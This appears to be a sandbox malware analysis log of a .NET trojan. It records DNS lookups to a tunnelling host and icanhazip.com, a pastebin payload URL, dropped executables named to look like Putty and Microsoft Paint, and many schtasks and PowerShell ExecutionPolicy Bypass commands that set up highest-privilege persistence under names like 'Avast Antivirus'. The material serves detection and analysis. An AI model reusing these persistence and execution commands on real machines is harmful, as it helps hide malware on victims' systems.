Source: global traffic, DNS traffic detected: DNS query: q-policies.gl.at.ply.gg
Source: global traffic, DNS traffic detected: DNS query: icanhazip.com
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.000000000292B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.000000000276B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1199190845.000000001C0A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm=C:
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadi
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/LmbvnzZM
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: cmd.exeProcess created: 46

System Summary

Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile dump: xdwdPutty.exe.0.dr 740754944
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeFile dump: xdwdMicrosoft PowerPoint Host.exe.19.dr 739685376
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F60F3F NtProtectVirtualMemory,0_2_00007FFF60F60F3F
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Windows\xdwd.dll
Source: ptKNiAaGus.exeStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: xdwdPutty.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSendFile.dll2 vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000002.3328765647.0000000012CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000000.858376455.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exeBinary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.csSecurity API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.csSecurity API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csSecurity API names: File.GetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csSecurity API names: File.SetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, TJFZgosWeymV.csSecurity API names: File.GetAccessControl
Source: ptKNiAaGus.exe, TJFZgosWeymV.csSecurity API names: File.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csSecurity API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csSecurity API names: Directory.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.csSecurity API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.csSecurity API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.csSecurity API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.csSecurity API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.csSecurity API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.csSecurity API names: File.SetAccessControl
Source: ptKNiAaGus.exe, YcZNhzMi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csSecurity API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csSecurity API names: Directory.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WJEyDHemWfF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdPutty.exe.33.dr, WJEyDHemWfF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.csSecurity API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.csSecurity API names: Directory.SetAccessControl
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ptKNiAaGus.exe, ngXUOZCVh.csSecurity API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, ngXUOZCVh.csSecurity API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.csSecurity API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.csSecurity API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.csSecurity API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.csSecurity API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csSecurity API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csSecurity API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.csSecurity API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.csSecurity API names: File.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.csSecurity API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.csSecurity API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.csSecurity API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.csSecurity API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WJEyDHemWfF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engineClassification label: mal100.troj.evad.winEXE@196/11@4/3
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Users\user\xdwdPutty.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMutant created: \Sessions\1\BaseNamedObjects\Sheet_kctlwwmgcldm
Source: C:\Users\user\xdwdPutty.exeMutant created: NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeMutant created: \Sessions\1\BaseNamedObjects\Sheet_gwjvyiugty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvdx4sk4.juy.ps1
Source: ptKNiAaGus.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ptKNiAaGus.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ptKNiAaGus.exeReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile read: C:\Users\user\Desktop\ptKNiAaGus.exe
Source: unknownProcess created: C:\Users\user\Desktop\ptKNiAaGus.exe "C:\Users\user\Desktop\ptKNiAaGus.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: unknownProcess created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: unknownProcess created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
